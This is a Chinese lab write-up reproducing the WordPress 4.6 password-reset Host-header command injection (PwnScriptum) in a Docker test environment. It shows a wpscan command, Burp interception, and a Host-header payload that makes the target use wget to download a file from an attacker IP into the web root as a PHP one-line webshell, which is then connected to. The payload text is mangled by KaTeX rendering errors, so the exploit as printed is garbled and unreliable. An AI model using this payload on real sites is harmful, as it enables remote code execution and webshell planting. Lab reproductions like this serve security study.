文章目录

  • 一、搭建环境
  • 二、漏洞复现
    • 1.抓包
    • 2.准备payload
    • 3.发送payload
    • 4.检查是否上传成功
    • 5.连接payload

国外的:Wordpress,Drupal,Joomla,这是国外最流行的3大CMS。国内则是DedeCMS和帝国,PHPCMS等。
国内的CMS会追求大而全,而国外的CMS更注重生态,更注重友好的接口,更多的功能留给第三方开发插件来实现。
推荐几个比较新的:ProcessWire,OctoberCMS,CraftCMS

一、搭建环境

进入wordpress里的pwnscriptum里运行docker
docker-compose up -d 拉取环境

扫描一下wordpress的版本,只有4.6及以下的版本才有这个漏洞
wpscan –url http://192.168.25.128:8080/

二、漏洞复现

1.抓包

点击忘记密码,输入刚才创建的用户名或者电子邮箱

开启burp抓包拦截

2.准备payload

Host: aa(any -froot@localhost -be KaTeX parse error: Expected ‘}’, got ‘EOF’ at end of input: {run{{substr{0}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 16: spool_directory}̲}usr{substr{0}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 16: spool_directory}̲}bin{substr{0}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 16: spool_directory}̲}wget{substr{10}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 8: tod_log}̲}–output-docum…{substr{10}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 8: tod_log}̲}{substr{0}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 16: spool_directory}̲}var{substr{0}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 16: spool_directory}̲}www{substr{0}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 16: spool_directory}̲}html{substr{0}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 16: spool_directory}̲}wutiangui.php{substr{10}{1}{KaTeX parse error: Expected ‘EOF’, got ‘}’ at position 8: tod_log}̲}192.168.155.2:…{substr{0}{1}{$spool_directory}}payload.txt}} null)
这句话的意思是从192.168.155.2 这个IP地址上下载文件payload.txt 到靶机上的var/www/html目录下的wutiangui.php文件里

3.发送payload

通过BP把一句话木马输入到靶机上,测试一下是否可以通过BP写入成功

4.检查是否上传成功

网页回显没报错,应该成功了
执行后进入以下目录查看
/var/lib/docker/overlay2/b0766f51462cbcb76c2f483c439ab74adce69f6b1f5325b69f67ef889ee3b21e/merged/var/www/html

可以发现生成wutiangui.php

5.连接payload

用御剑连接成功